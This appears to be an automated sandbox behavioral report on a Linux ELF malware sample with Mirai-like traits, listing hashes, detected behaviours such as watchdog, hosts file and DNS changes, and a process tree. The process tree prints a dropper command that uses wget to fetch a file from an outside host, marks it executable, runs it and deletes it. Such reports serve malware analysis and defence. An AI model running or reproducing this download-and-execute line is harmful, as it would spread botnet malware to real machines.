Analysis
-
max time kernel
0s -
max time network
134s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20221111-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
08-04-2023 21:51
Behavioral task
behavioral1
Sample
x86.elf
Resource
ubuntu1804-amd64-20221111-en
General
-
Target
x86.elf
-
Size
114KB
-
MD5
d219cae24ada1bd4cd696e9830d8d96d
-
SHA1
4d1b9ec042954e7c2ed9348629318b7936822a40
-
SHA256
768d8a5e0bdea22776c1570bf82e7c8089577c7d44d0dee87101992c7bae9827
-
SHA512
a2eaa10d31e5cb41a80cdaeef895c18d36db2c67df714e44e9895e3765ec20f770a9d497accdc4ea0746a95f34390153213e30c4d3199ffa507b740e3e204376
-
SSDEEP
3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJioub2yd1m7FnVqfJXoebNb:SKo/O8qtUbKRbm7FnVqfJXoebNb
Malware Config
Signatures
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
wgetdescription ioc process /etc/hosts /etc/hosts wget -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
x86.elfdescription ioc process /proc/net/route /proc/net/route x86.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
x86.elfdescription ioc process /proc/net/route /proc/net/route x86.elf
Processes
-
/tmp/x86.elf/tmp/x86.elf1⤵
- Reads system routing table
- Reads system network configuration
PID:618
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."1⤵PID:619
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....2⤵
- Modifies hosts file
- Writes DNS configuration
PID:623 -
/bin/chmodchmod 777 .....2⤵PID:624
-
./....../.....2⤵PID:625
-
/bin/sh/bin/sh ./.....2⤵PID:625
-
/bin/rmrm -rf .....2⤵PID:627